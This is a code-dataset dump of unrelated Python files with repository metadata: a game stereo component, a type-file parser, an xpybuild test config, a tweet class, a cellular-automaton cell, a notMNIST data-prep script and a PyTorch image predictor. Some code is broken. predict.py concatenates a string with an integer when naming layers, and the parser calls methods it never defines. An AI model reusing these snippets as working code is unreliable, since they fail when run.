        """Return True when the current channel state is anything other than the off state."""
        current_channel = self.owner.get_state(self.channel_state)
        return current_channel != self.off_state
    def get_available_picker_channel_states(self, context):
        """Yield client channel states flagged for the picker that pass their channel test for ``context``."""
        for client_state in self.owner.get_client_states(self.channel_state):
            if client_state.show_in_picker:
                if client_state.test_channel(self.owner, context):
                    yield client_state
    def component_potential_interactions_gen(self, context, **kwargs):
        """Yield listen interactions for the active channel; yields nothing while the stereo is off."""
        current_channel = self.owner.get_state(self.channel_state)
        if current_channel != self.off_state:
            # First succeeding listen affordance wins (ordered list, see tuning docs).
            for listen_affordance in self.listen_affordances:
                yield from listen_affordance.potential_interactions(self.owner, context, required_station=current_channel, off_state=self.off_state, **kwargs)
(_, TunableStereoComponentSnippet) = define_snippet('stereo_component', StereoComponent.TunableFactory())
| 766
| 1,928
| 23
|
603ff613688cffe6ba5669264455c110de9a9652
| 1,274
|
py
|
Python
|
programs/koinos-types/koinos_reflect/baseparser.py
|
joticajulian/koinos-types
|
7d01248437d063deb780af03057737e4937f82d1
|
[
"MIT"
] | 10
|
2021-02-10T20:57:08.000Z
|
2021-03-17T00:09:15.000Z
|
programs/koinos-types/koinos_reflect/baseparser.py
|
joticajulian/koinos-types
|
7d01248437d063deb780af03057737e4937f82d1
|
[
"MIT"
] | 82
|
2021-02-08T22:59:24.000Z
|
2021-10-01T17:40:07.000Z
|
programs/koinos-types/koinos_reflect/baseparser.py
|
joticajulian/koinos-types
|
7d01248437d063deb780af03057737e4937f82d1
|
[
"MIT"
] | 3
|
2021-02-11T04:29:39.000Z
|
2021-04-17T22:56:34.000Z
|
from .lexer import Lexer
from dataclasses_json import dataclass_json
from dataclasses import dataclass, field
from typing import List, Tuple, Union
# Parser of .base files
# Syntax is semicolon separated list of qualified types
@dataclass_json
@dataclass
@dataclass_json
@dataclass
| 23.163636
| 64
| 0.605965
|
from .lexer import Lexer
from dataclasses_json import dataclass_json
from dataclasses import dataclass, field
from typing import List, Tuple, Union
# Parser of .base files
# Syntax is semicolon separated list of qualified types
@dataclass_json
@dataclass
class BasefileType:
    """One qualified type entry parsed from a .base file."""
    # Qualifier-separated name components (split on the lexer's QUAL token).
    name: List[str]
    # Documentation text carried on the trailing semicolon token.
    doc: str
@dataclass_json
@dataclass
class BasefileTop:
    """Parsed top level of a .base file."""
    # Type entries in file order.
    types: List[BasefileType]
    # File-level documentation text -- presumably from a leading comment; verify against the lexer.
    doc: str
class BasefileParser:
    """Parser for .base files: a semicolon-separated list of qualified type names."""
    def __init__(self, data):
        # Tokenise the raw input once up front.
        self.lexer = Lexer(data)
    def parse(self):
        """Parse the whole input.

        NOTE(review): delegates to ``parse_toplevel``, and the loop below uses
        ``self.peek``/``self.expect`` -- none of which are defined in this class
        as shown here.  Confirm they exist elsewhere (e.g. a fuller version of
        this file or a mixin) before relying on this code path.
        """
        return self.parse_toplevel()
    def parse_typelist(self):
        """Parse 'qualname ;' entries until EOF; stray semicolons are skipped."""
        result = []
        while True:
            tok = self.peek()
            if tok.ttype == "EOF":
                break
            elif tok.ttype == "SEMI":
                self.expect("SEMI")
                continue
            name = self.parse_qualname()
            semi = self.expect("SEMI")
            # The doc comment rides on the terminating semicolon token.
            result.append(BasefileType(name=name, doc=semi.doc))
        return result
    def parse_qualname(self):
        """Parse ID (QUAL ID)* and return the list of name components."""
        result = []
        result.append(self.expect("ID").text)
        while self.peek().ttype == "QUAL":
            self.expect("QUAL")
            result.append(self.expect("ID").text)
        return result
def parse(data):
    """Convenience wrapper: parse ``data`` with a fresh BasefileParser."""
    return BasefileParser(data).parse()
| 718
| 71
| 197
|
9ab9dde5ff068e3fbee8407c86a3718d396063cf
| 2,372
|
py
|
Python
|
tests/correctness/targets/CppCompilationWithTargetDeps/Input/root.xpybuild.py
|
xpybuild/xpybuild
|
c71a73e47414871c8192381d0356ab62f5a58127
|
[
"Apache-2.0"
] | 9
|
2017-02-06T16:45:46.000Z
|
2021-12-05T09:42:58.000Z
|
tests/correctness/targets/CppCompilationWithTargetDeps/Input/root.xpybuild.py
|
xpybuild/xpybuild
|
c71a73e47414871c8192381d0356ab62f5a58127
|
[
"Apache-2.0"
] | 15
|
2019-01-11T19:39:34.000Z
|
2022-01-08T11:11:35.000Z
|
tests/correctness/targets/CppCompilationWithTargetDeps/Input/root.xpybuild.py
|
xpybuild/xpybuild
|
c71a73e47414871c8192381d0356ab62f5a58127
|
[
"Apache-2.0"
] | 5
|
2017-02-06T16:51:17.000Z
|
2020-12-02T17:36:30.000Z
|
#
# Copyright (c) 2013 - 2017, 2019 Software AG, Darmstadt, Germany and/or its licensors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
from xpybuild.propertysupport import *
from xpybuild.buildcommon import *
from xpybuild.pathsets import *
from xpybuild.targets.native import *
from xpybuild.targets.copy import Copy
from xpybuild.utils.compilers import GCC, VisualStudio
include(os.environ['PYSYS_TEST_ROOT_DIR']+'/build_utilities/native_config.xpybuild.py')
setGlobalOption('native.include.upToDateCheckIgnoreRegex', '(c:/program files.*|.*/tESt4.h)' if IS_WINDOWS else '.*/test4.h')
setGlobalOption('native.include.upToDateCheckIgnoreSystemHeaders', True) # only works on linux/gcc currently
Copy('${OUTPUT_DIR}/my-generated-include-files/', FindPaths('./include-src/'))
Copy('${OUTPUT_DIR}/my-generated-include-files2/generatedpath/test3.h', FindPaths('./include-src/generatedpath/'))
Copy('${OUTPUT_DIR}/test-generated.cpp', './test.cpp')
Cpp(objectname('${OUTPUT_DIR}/no-target-deps'), './test.cpp',
includes=[
"./include/",
'./include-src/',
]
)
Cpp(objectname('${OUTPUT_DIR}/target-cpp-and-include-dir'), '${OUTPUT_DIR}/test-generated.cpp',
includes=[
"./include/",
'${OUTPUT_DIR}/my-generated-include-files/', # a target
]
)
Cpp(objectname('${OUTPUT_DIR}/target-cpp'), '${OUTPUT_DIR}/test-generated.cpp',
includes=[
"./include/",
'./include-src/',
]
)
Cpp(objectname('${OUTPUT_DIR}/target-include-dir'), './test.cpp',
includes=[
"./include/",
'${OUTPUT_DIR}/my-generated-include-files/', # a target
]
)
# generated include files in non-target directories are no longer supported
Cpp(objectname('${OUTPUT_DIR}/target-include-file'), './test.cpp',
includes=[
"./include/",
TargetsWithinDir('${OUTPUT_DIR}/my-generated-include-files2/'), # NOT a target, but contains one
]
)
| 33.885714
| 125
| 0.718381
|
#
# Copyright (c) 2013 - 2017, 2019 Software AG, Darmstadt, Germany and/or its licensors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
from xpybuild.propertysupport import *
from xpybuild.buildcommon import *
from xpybuild.pathsets import *
from xpybuild.targets.native import *
from xpybuild.targets.copy import Copy
from xpybuild.utils.compilers import GCC, VisualStudio
# Shared compiler configuration for the test framework.
include(os.environ['PYSYS_TEST_ROOT_DIR']+'/build_utilities/native_config.xpybuild.py')
setGlobalOption('native.include.upToDateCheckIgnoreRegex', '(c:/program files.*|.*/tESt4.h)' if IS_WINDOWS else '.*/test4.h')
setGlobalOption('native.include.upToDateCheckIgnoreSystemHeaders', True) # only works on linux/gcc currently
# Copy targets that generate the headers/sources consumed by the Cpp targets below.
Copy('${OUTPUT_DIR}/my-generated-include-files/', FindPaths('./include-src/'))
Copy('${OUTPUT_DIR}/my-generated-include-files2/generatedpath/test3.h', FindPaths('./include-src/generatedpath/'))
Copy('${OUTPUT_DIR}/test-generated.cpp', './test.cpp')
# Baseline: compiles a static source with no dependencies on other targets.
Cpp(objectname('${OUTPUT_DIR}/no-target-deps'), './test.cpp',
	includes=[
		"./include/",
		'./include-src/',
	]
	)
# Both the .cpp and an include dir are build targets.
Cpp(objectname('${OUTPUT_DIR}/target-cpp-and-include-dir'), '${OUTPUT_DIR}/test-generated.cpp',
	includes=[
		"./include/",
		'${OUTPUT_DIR}/my-generated-include-files/', # a target
	]
	)
# Only the .cpp is a build target.
Cpp(objectname('${OUTPUT_DIR}/target-cpp'), '${OUTPUT_DIR}/test-generated.cpp',
	includes=[
		"./include/",
		'./include-src/',
	]
	)
# Only an include dir is a build target.
Cpp(objectname('${OUTPUT_DIR}/target-include-dir'), './test.cpp',
	includes=[
		"./include/",
		'${OUTPUT_DIR}/my-generated-include-files/', # a target
	]
	)
# generated include files in non-target directories are no longer supported
Cpp(objectname('${OUTPUT_DIR}/target-include-file'), './test.cpp',
	includes=[
		"./include/",
		TargetsWithinDir('${OUTPUT_DIR}/my-generated-include-files2/'), # NOT a target, but contains one
	]
	)
| 0
| 0
| 0
|
a1a87cc46f9c970e2f28007cb3e1126704e78b89
| 3,842
|
py
|
Python
|
twirps/classes/tweet.py
|
condnsdmatters/twirps
|
e2a15ae21129fedb400415ad1b70f6a931b046c4
|
[
"MIT"
] | 3
|
2015-05-08T16:19:40.000Z
|
2016-05-03T07:54:04.000Z
|
twirps/classes/tweet.py
|
condnsdmatters/twirps
|
e2a15ae21129fedb400415ad1b70f6a931b046c4
|
[
"MIT"
] | null | null | null |
twirps/classes/tweet.py
|
condnsdmatters/twirps
|
e2a15ae21129fedb400415ad1b70f6a931b046c4
|
[
"MIT"
] | null | null | null |
from __future__ import unicode_literals
import logging
LOGGER = logging.getLogger(__name__)
| 35.247706
| 118
| 0.61114
|
from __future__ import unicode_literals
import logging
LOGGER = logging.getLogger(__name__)
class Tweet(object):
def __init__(self, tweet, source):
self.tweet_id = 0
self.user_id = 0
self.handle = ''
self.mentions = []
self.content = ''
self.is_retweet = False
self.retweeted_user=None
self.retweet_status_id = 0
self.is_reply = False
self.in_reply_to_user = None
self.in_reply_to_status_id = None
self.retweet_count = 0
self.favourite_count = 0
self.hashtags = []
self.date = ''
self.urls = []
self.website_link = None
if source=='twitter':
self.from_twitter(tweet)
elif source=='database':
self.from_database(tweet)
def from_twitter(self, tweet):
self.tweet_id = tweet.id
self.user_id = tweet.user.id
self.handle = tweet.user.screen_name
self.date = tweet.created_at
self.retweet_count = tweet.retweet_count
self.favourite_count = tweet.favorite_count
self.website_link=u'https://twitter.com/'+self.handle+u'/status/'+str(self.tweet_id)
if tweet.in_reply_to_user_id != None:
#self.mentions.append((tweet.in_reply_to_user_id, tweet.in_reply_to_screen_name))
self.is_reply = True
self.in_reply_to_user = (tweet.in_reply_to_user_id,tweet.in_reply_to_screen_name)
self.in_reply_to_status_id = tweet.in_reply_to_status_id
if hasattr(tweet, 'retweeted_status'):
tweet = tweet.retweeted_status
self.retweeted_user = (tweet.user.id, tweet.user.screen_name)
self.is_retweet = True
self.retweet_status_id = tweet.id
# self.retweeted_uid = tweet.user.id
# self.mentions.append((tweet.user.id, tweet.user.screen_name))
self.content = tweet.text
self.mentions = [ (ent['id'],ent['screen_name']
) for ent in tweet.entities['user_mentions']]
self.hashtags = [ent['text'] for ent in tweet.entities['hashtags']]
self.urls = [urls['expanded_url'] for urls in tweet.entities['urls']]
def __str__(self):
return u'Tweet: %d %s || RC: %d || FC: %d || RT: %s || @ %s || # %s || Url %s\nContent: %s' %(
self.tweet_id, self.handle, self.retweet_count, self.favourite_count,
self.retweeted_user[1] if self.is_retweet else '', len(self.mentions), len(self.hashtags), len(self.urls),
unicode(self.content) )
def from_database(self, tweet_tuple):
self.tweet_id = tweet_tuple[0]
self.user_id = tweet_tuple[1]
self.handle = tweet_tuple[2].decode('utf-8')
self.is_retweet = tweet_tuple[3]
self.is_reply = tweet_tuple[4]
self.content = tweet_tuple[5].decode('utf-8')
self.favourite_count = tweet_tuple[6]
self.retweet_count = tweet_tuple[7]
self.date =tweet_tuple[8]
self.website_link=u'https://twitter.com/'+self.handle+u'/status/'+str(self.tweet_id)
self.from_database_add_entities(tweet_tuple)
def from_database_add_entities(self, tweet_tuple):
if tweet_tuple[9] == 'hashtag':
self.hashtags.append( tweet_tuple[10].decode('utf-8') )
elif tweet_tuple[9] == 'url':
self.urls.append( tweet_tuple[10] )
elif tweet_tuple[9] == 'mention':
self.mentions.append( (tweet_tuple[11],tweet_tuple[10].decode('utf-8')) )
elif tweet_tuple[9] == 'retweet':
self.retweeted_user = (tweet_tuple[11],tweet_tuple[10].decode('utf-8') )
elif tweet_tuple[9] == 'reply':
self.in_reply_to_user = (tweet_tuple[11],tweet_tuple[10].decode('utf-8') )
| 3,578
| -1
| 157
|
e6443063857f8fb51ef5d2e6135b5f0c53f6f899
| 200
|
py
|
Python
|
code/tools/idl/header.py
|
antonand03/hello-my-friend
|
fb4e225a75aea3007a391ccc4dcda3eda65c2142
|
[
"MIT"
] | 5,411
|
2017-04-14T08:57:56.000Z
|
2022-03-30T19:35:15.000Z
|
code/tools/idl/header.py
|
antonand03/hello-my-friend
|
fb4e225a75aea3007a391ccc4dcda3eda65c2142
|
[
"MIT"
] | 802
|
2017-04-21T14:18:36.000Z
|
2022-03-31T21:20:48.000Z
|
code/tools/idl/header.py
|
antonand03/hello-my-friend
|
fb4e225a75aea3007a391ccc4dcda3eda65c2142
|
[
"MIT"
] | 2,011
|
2017-04-14T09:44:15.000Z
|
2022-03-31T15:40:39.000Z
|
# add dependency directory to the Python path
import site
import os.path
site.addsitedir(os.path.join(os.path.dirname(__file__), 'deps'))
# call header.py
from xpidl import header
header.main()
| 20
| 64
| 0.755
|
# add dependency directory to the Python path
import site
import os.path
site.addsitedir(os.path.join(os.path.dirname(__file__), 'deps'))
# call header.py
from xpidl import header
header.main()
| 0
| 0
| 0
|
8954b1341863a803d5c1520e4ecd7f34aaffdd4d
| 1,476
|
py
|
Python
|
snim/cell.py
|
markormerod/simple-neural-ignition-model
|
70867d66fefd237cdc2cb9a6318c5a7782759d59
|
[
"MIT"
] | null | null | null |
snim/cell.py
|
markormerod/simple-neural-ignition-model
|
70867d66fefd237cdc2cb9a6318c5a7782759d59
|
[
"MIT"
] | null | null | null |
snim/cell.py
|
markormerod/simple-neural-ignition-model
|
70867d66fefd237cdc2cb9a6318c5a7782759d59
|
[
"MIT"
] | null | null | null |
from snim.snim_state import SnimState
| 35.142857
| 94
| 0.590108
|
from snim.snim_state import SnimState
class Cell:
def __init__(self, x, y, state = SnimState.EMPTY):
self.x = x
self.y = y
self.state = state
def update(self, snim):
neighbours = snim.get_diag_neighbours(self.x, self.y)
neural_neighbours = sum(1 for n in neighbours if n.state is not SnimState.EMPTY)
firing_neighbours = sum(1 for n in neighbours if n.state is SnimState.FIRING)
if self.state is SnimState.EMPTY:
# If all of the surrounding cells are living, spawn a new neuron
if neural_neighbours is 4:
self.state = SnimState.RESTING
return
if self.state is SnimState.FIRING:
# If firing and there are no surrounding living cells, can't discharge so stay lit
if neural_neighbours < 1:
self.state = SnimState.FIRING
return
self.state = SnimState.RECOVERING
return
if self.state is SnimState.RECOVERING:
# If recovering and over 2 neighbours are firing, reignite
if firing_neighbours > 2:
self.state = SnimState.FIRING
return
self.state = SnimState.RESTING
return
if self.state is SnimState.RESTING:
# If resting and any neighbours fire, ignite
if firing_neighbours >= 1:
self.state = SnimState.FIRING
return
| 1,373
| -10
| 76
|
6a1501d572a47250fb79ebd30d23104a3301cddd
| 8,925
|
py
|
Python
|
not_mnist/src/setup.py
|
srungta/mnist-and-others
|
829993d85a9090c0036331bcf12195c815447946
|
[
"MIT"
] | null | null | null |
not_mnist/src/setup.py
|
srungta/mnist-and-others
|
829993d85a9090c0036331bcf12195c815447946
|
[
"MIT"
] | null | null | null |
not_mnist/src/setup.py
|
srungta/mnist-and-others
|
829993d85a9090c0036331bcf12195c815447946
|
[
"MIT"
] | null | null | null |
# imports
from __future__ import print_function
from IPython.display import display, Image
from six.moves import cPickle as pickle
from six.moves.urllib.request import urlretrieve
from sklearn.linear_model import LogisticRegression
import imageio
import matplotlib.pyplot as plt
import numpy as np
import os
import sys
import tarfile
from constants import *
from commonconstants import NOT_MNIST_ZIPS_DIR, NOT_MNIST_IMAGES_DIR, NOT_MNIST_PICKLES_DIR
from file_helper import get_file_name, join_paths
np.random.seed(NUMPY_SEED)
last_percent_reported = None
def download_progress_hook(count, blockSize, totalSize):
"""A hook to report the progress of a download. This is mostly intended for users with
slow internet connections. Reports every 5% change in download progress.
"""
global last_percent_reported
percent = int(count*blockSize*100 / totalSize)
if last_percent_reported != percent:
if percent % 5 == 0:
sys.stdout.write('%s%%' % percent)
sys.stdout.flush()
else:
sys.stdout.write('.')
sys.stdout.flush()
last_percent_reported = percent
def load_letter(folder, min_num_images):
"""Load the data for a single letter label."""
image_files = os.listdir(folder)
dataset = np.ndarray(shape=(len(image_files), IMAGE_SIZE, IMAGE_SIZE),
dtype=np.float32)
print(folder)
num_images = 0
for image in image_files:
image_file = os.path.join(folder, image)
try:
image_data = (imageio.imread(image_file).astype(float) -
PIXEl_DEPTh / 2) / PIXEl_DEPTh
if image_data.shape != (IMAGE_SIZE, IMAGE_SIZE):
raise Exception('Unexpected image shape: %s' %
str(image_data.shape))
dataset[num_images, :, :] = image_data
num_images = num_images + 1
except (IOError, ValueError) as e:
print('Could not read:', image_file,
':', e, '- it\'s ok, skipping.')
dataset = dataset[0:num_images, :, :]
if num_images < min_num_images:
raise Exception('Many fewer images than expected: %d < %d' %
(num_images, min_num_images))
print('Full dataset tensor:', dataset.shape)
print('Mean:', np.mean(dataset))
print('Standard deviation:', np.std(dataset))
return dataset
if __name__ == '__main__':
# Large
main(TRAINING_SIZE, VALIDATION_SIZE, TEST_SIZE, FINAL_DATASET_FILENAME)
# Small
main(TRAINING_SIZE_SMALL, VALIDATION_SIZE_SMALL, TEST_SIZE_SMALL, FINAL_DATASET_FILENAME_SMALL)
| 38.469828
| 99
| 0.662073
|
# imports
from __future__ import print_function
from IPython.display import display, Image
from six.moves import cPickle as pickle
from six.moves.urllib.request import urlretrieve
from sklearn.linear_model import LogisticRegression
import imageio
import matplotlib.pyplot as plt
import numpy as np
import os
import sys
import tarfile
from constants import *
from commonconstants import NOT_MNIST_ZIPS_DIR, NOT_MNIST_IMAGES_DIR, NOT_MNIST_PICKLES_DIR
from file_helper import get_file_name, join_paths
np.random.seed(NUMPY_SEED)
last_percent_reported = None
def download_progress_hook(count, blockSize, totalSize):
"""A hook to report the progress of a download. This is mostly intended for users with
slow internet connections. Reports every 5% change in download progress.
"""
global last_percent_reported
percent = int(count*blockSize*100 / totalSize)
if last_percent_reported != percent:
if percent % 5 == 0:
sys.stdout.write('%s%%' % percent)
sys.stdout.flush()
else:
sys.stdout.write('.')
sys.stdout.flush()
last_percent_reported = percent
def maybe_download(filename, expected_bytes, force=False):
dest_filename = os.path.join(NOT_MNIST_ZIPS_DIR, filename)
if force or not os.path.exists(dest_filename):
print('Attempting to download:', filename)
filename, _ = urlretrieve(
DATASET_DOWNLOAD_URL + filename, dest_filename, reporthook=download_progress_hook)
print('\nDownload complete!')
statinfo = os.stat(dest_filename)
if statinfo.st_size == expected_bytes:
print('Found and verified', dest_filename)
else:
raise Exception(
'Failed to verify ' + dest_filename + '. Get using abrowser.'
)
return dest_filename
def maybe_extract(filename, force=False):
root = os.path.splitext(os.path.splitext(get_file_name(filename))[0])[0] # remove .tar.gz
root = join_paths(NOT_MNIST_IMAGES_DIR, root)
if os.path.isdir(root) and not force:
# You may override by setting force=True.
print('%s already present - Skipping extraction of %s.' %
(root, filename))
else:
print('Extracting data for %s. This may take a while. Please wait.' % root)
tar = tarfile.open(filename)
sys.stdout.flush()
tar.extractall(NOT_MNIST_IMAGES_DIR)
tar.close()
data_folders = [
os.path.join(root, d) for d in sorted(os.listdir(root))
if os.path.isdir(os.path.join(root, d))]
if len(data_folders) != NUM_OF_CLASSES:
raise Exception(
'Expected %d folders, one per class. Found %d instead.' % (
NUM_OF_CLASSES, len(data_folders)))
print(data_folders)
return data_folders
def load_letter(folder, min_num_images):
"""Load the data for a single letter label."""
image_files = os.listdir(folder)
dataset = np.ndarray(shape=(len(image_files), IMAGE_SIZE, IMAGE_SIZE),
dtype=np.float32)
print(folder)
num_images = 0
for image in image_files:
image_file = os.path.join(folder, image)
try:
image_data = (imageio.imread(image_file).astype(float) -
PIXEl_DEPTh / 2) / PIXEl_DEPTh
if image_data.shape != (IMAGE_SIZE, IMAGE_SIZE):
raise Exception('Unexpected image shape: %s' %
str(image_data.shape))
dataset[num_images, :, :] = image_data
num_images = num_images + 1
except (IOError, ValueError) as e:
print('Could not read:', image_file,
':', e, '- it\'s ok, skipping.')
dataset = dataset[0:num_images, :, :]
if num_images < min_num_images:
raise Exception('Many fewer images than expected: %d < %d' %
(num_images, min_num_images))
print('Full dataset tensor:', dataset.shape)
print('Mean:', np.mean(dataset))
print('Standard deviation:', np.std(dataset))
return dataset
def maybe_pickle(data_folders, min_num_images_per_class, force=False):
dataset_names = []
for folder in data_folders:
set_filename = folder + '.pickle'
dataset_names.append(set_filename)
if os.path.exists(set_filename) and not force:
# You may override by setting force=True.
print('%s already present - Skipping pickling.' % set_filename)
else:
print('Pickling %s.' % set_filename)
dataset = load_letter(folder, min_num_images_per_class)
try:
with open(set_filename, 'wb') as f:
pickle.dump(dataset, f, pickle.HIGHEST_PROTOCOL)
except Exception as e:
print('Unable to save data to', set_filename, ':', e)
return dataset_names
def make_arrays(nb_rows, img_size):
if nb_rows:
dataset = np.ndarray((nb_rows, img_size, img_size), dtype=np.float32)
labels = np.ndarray(nb_rows, dtype=np.int32)
else:
dataset, labels = None, None
return dataset, labels
def merge_datasets(pickle_files, train_size, valid_size=0):
NUM_OF_CLASSES = len(pickle_files)
valid_dataset, valid_labels = make_arrays(valid_size, IMAGE_SIZE)
train_dataset, train_labels = make_arrays(train_size, IMAGE_SIZE)
vsize_per_class = valid_size // NUM_OF_CLASSES
tsize_per_class = train_size // NUM_OF_CLASSES
start_v, start_t = 0, 0
end_v, end_t = vsize_per_class, tsize_per_class
end_l = vsize_per_class+tsize_per_class
for label, pickle_file in enumerate(pickle_files):
try:
with open(pickle_file, 'rb') as f:
letter_set = pickle.load(f)
# let's shuffle the letters to have random validation and training set
np.random.shuffle(letter_set)
if valid_dataset is not None:
valid_letter = letter_set[:vsize_per_class, :, :]
valid_dataset[start_v:end_v, :, :] = valid_letter
valid_labels[start_v:end_v] = label
start_v += vsize_per_class
end_v += vsize_per_class
train_letter = letter_set[vsize_per_class:end_l, :, :]
train_dataset[start_t:end_t, :, :] = train_letter
train_labels[start_t:end_t] = label
start_t += tsize_per_class
end_t += tsize_per_class
except Exception as e:
print('Unable to process data from', pickle_file, ':', e)
raise
return valid_dataset, valid_labels, train_dataset, train_labels
def get_dataset_filenames():
train_filename = maybe_download(NOT_MNIST_FILENAME_LARGE, 247336696)
test_filename = maybe_download(NOT_MNIST_FILENAME_SMALL, 8458043)
train_folders = maybe_extract(train_filename)
test_folders = maybe_extract(test_filename)
train_datasets = maybe_pickle(
train_folders, MINIMUM_TRAIN_SAMPLES_PER_CLASS)
test_datasets = maybe_pickle(test_folders, MINIMUM_TEST_SAMPLES_PER_CLASS)
return train_datasets, test_datasets
def randomize(dataset, labels):
permutation = np.random.permutation(labels.shape[0])
shuffled_dataset = dataset[permutation, :, :]
shuffled_labels = labels[permutation]
return shuffled_dataset, shuffled_labels
def main(train_size, valid_size, test_size, filename):
train_datasets, test_datasets = get_dataset_filenames()
valid_dataset, valid_labels, train_dataset, train_labels = merge_datasets(
train_datasets, train_size, valid_size)
_, _, test_dataset, test_labels = merge_datasets(test_datasets, test_size)
print('Training:', train_dataset.shape, train_labels.shape)
print('Validation:', valid_dataset.shape, valid_labels.shape)
print('Testing:', test_dataset.shape, test_labels.shape)
train_dataset, train_labels = randomize(train_dataset, train_labels)
test_dataset, test_labels = randomize(test_dataset, test_labels)
valid_dataset, valid_labels = randomize(valid_dataset, valid_labels)
pickle_file = os.path.join(NOT_MNIST_PICKLES_DIR, filename)
try:
f = open(pickle_file, 'wb')
save = {
'train_dataset': train_dataset,
'train_labels': train_labels,
'valid_dataset': valid_dataset,
'valid_labels': valid_labels,
'test_dataset': test_dataset,
'test_labels': test_labels,
}
pickle.dump(save, f, pickle.HIGHEST_PROTOCOL)
f.close()
except Exception as e:
print('Unable to save data to', pickle_file, ':', e)
raise
if __name__ == '__main__':
# Large
main(TRAINING_SIZE, VALIDATION_SIZE, TEST_SIZE, FINAL_DATASET_FILENAME)
# Small
main(TRAINING_SIZE_SMALL, VALIDATION_SIZE_SMALL, TEST_SIZE_SMALL, FINAL_DATASET_FILENAME_SMALL)
| 6,077
| 0
| 184
|
b6e2e662897fd5cdcc07c0f014fc63ad8afe8445
| 69
|
py
|
Python
|
pyex_pkg/pyex_pkg/module2.py
|
uiuc-bioinf-club/cheetSheets
|
537f85debfb3d98cd718963721b87a255913161b
|
[
"MIT"
] | null | null | null |
pyex_pkg/pyex_pkg/module2.py
|
uiuc-bioinf-club/cheetSheets
|
537f85debfb3d98cd718963721b87a255913161b
|
[
"MIT"
] | null | null | null |
pyex_pkg/pyex_pkg/module2.py
|
uiuc-bioinf-club/cheetSheets
|
537f85debfb3d98cd718963721b87a255913161b
|
[
"MIT"
] | 2
|
2019-02-18T23:18:31.000Z
|
2021-07-21T19:23:58.000Z
|
from module1 import func1
print("imported module2")
print(func1(2))
| 13.8
| 25
| 0.768116
|
from module1 import func1
print("imported module2")
print(func1(2))
| 0
| 0
| 0
|
249ce9f8a32de5d0f4e4b2826835c85645008e06
| 3,910
|
py
|
Python
|
predict.py
|
johirbuet/Image-Classifier
|
9cfd78696940ebc40725f15d18133d0db6102035
|
[
"MIT"
] | null | null | null |
predict.py
|
johirbuet/Image-Classifier
|
9cfd78696940ebc40725f15d18133d0db6102035
|
[
"MIT"
] | null | null | null |
predict.py
|
johirbuet/Image-Classifier
|
9cfd78696940ebc40725f15d18133d0db6102035
|
[
"MIT"
] | null | null | null |
import argparse
import json
import torch
from torch import nn
from torch.autograd import Variable
from torchvision import models
from collections import OrderedDict
from PIL import Image
import numpy as np
import numbers
if __name__ == "__main__":
main()
| 31.28
| 87
| 0.61509
|
import argparse
import json
import torch
from torch import nn
from torch.autograd import Variable
from torchvision import models
from collections import OrderedDict
from PIL import Image
import numpy as np
import numbers
def load_checkpoint(path):
checkpoint = torch.load(path)
arch = checkpoint['arch']
hidden_units = checkpoint['hidden_units']
if arch == "vgg13":
model = models.vgg13()
else:
model = models.densenet121()
if isinstance(hidden_units, numbers.Integral):
classifier = nn.Sequential(OrderedDict(
[
('fc1', nn.Linear(1024, hidden_units)),
('relu', nn.ReLU()),
('fc2', nn.Linear(hidden_units, 102)),
('output', nn.LogSoftmax(dim=1))
]))
model.classifier = classifier
else:
d = OrderedDict()
layers = []
i = 1
prev = 1024
for j in range(0,len(hidden_units) -1):
hi = hidden_units[j]
layers.append(('fc'+i, nn.Linear(prev, hi)))
layers.append(('relu'+i, nn.ReLU()))
prev = hi
i = i + 1
layers.append(('fc'+i, nn.Linear(prev, hidden_units[len(hidden_units) - 1])))
layers.append(('output', nn.LogSoftmax(dim=1)))
classifier = nn.Sequential(OrderedDict(layers))
model.classifier = classifier
model.load_state_dict(checkpoint['state_dict'])
class_to_idx = checkpoint['class_to_idx']
idx_to_class = {i: k for k, i in class_to_idx.items()}
return model, class_to_idx, idx_to_class
def process_image(image):
size = 256, 256
image.thumbnail(size, Image.ANTIALIAS)
image = image.crop((
size[0] // 2 - (224 / 2),
size[1] // 2 - (224 / 2),
size[0] // 2 + (224 / 2),
size[1] // 2 + (224 / 2))
)
np_image = np.array(image) / 255
np_image[:, :, 0] = (np_image[:, :, 0] - 0.485) / (0.229)
np_image[:, :, 1] = (np_image[:, :, 1] - 0.456) / (0.224)
np_image[:, :, 2] = (np_image[:, :, 2] - 0.406) / (0.225)
np_image = np.transpose(np_image, (2, 0, 1))
return np_image
def predict(image_path, model, idx_to_class, cat_to_name, topk, gpu):
if gpu and torch.cuda.is_available():
model.cuda()
image = process_image(Image.open(image_path))
image = torch.FloatTensor([image])
model.eval()
if gpu and torch.cuda.is_available():
inputs = Variable(image.cuda())
else:
inputs = Variable(image)
output = model.forward(inputs)
ps = torch.exp(output).data.cpu().numpy()[0]
topk_index = np.argsort(ps)[-topk:][::-1]
topk_class = [idx_to_class[x] for x in topk_index]
named_topk_class = [cat_to_name[x] for x in topk_class]
topk_prob = ps[topk_index]
return topk_prob, named_topk_class
def label_mapping(cat_to_name):
with open(cat_to_name, 'r') as f:
return json.load(f)
def main():
parser = argparse.ArgumentParser(description='Predict flower types')
parser.add_argument('--gpu', action='store_true', help='Using GPU or not')
parser.add_argument('input', type=str, help='Path to image that will be predicted')
parser.add_argument('checkpoint', type=str, help='Path to training checkpoint')
parser.add_argument('--category_names', type=str, default='cat_to_name.json',
help='Path to category to flower name mapping json')
parser.add_argument('--topk', type=int, default=5, help='Top k probabilities')
args = parser.parse_args()
cat_to_name = label_mapping(args.category_names)
model, class_to_idx, idx_to_class = load_checkpoint(args.checkpoint)
topk_prob, named_topk_class = predict(args.input, model, idx_to_class,
cat_to_name, args.topk, args.gpu)
print(dict(zip(named_topk_class, topk_prob)))
if __name__ == "__main__":
main()
| 3,530
| 0
| 115
|
32ae876b42b6bb362bf46f31ffcb82c4faec760d
| 10,325
|
py
|
Python
|
devp2p/peer.py
|
vaporyproject/pydevp2p
|
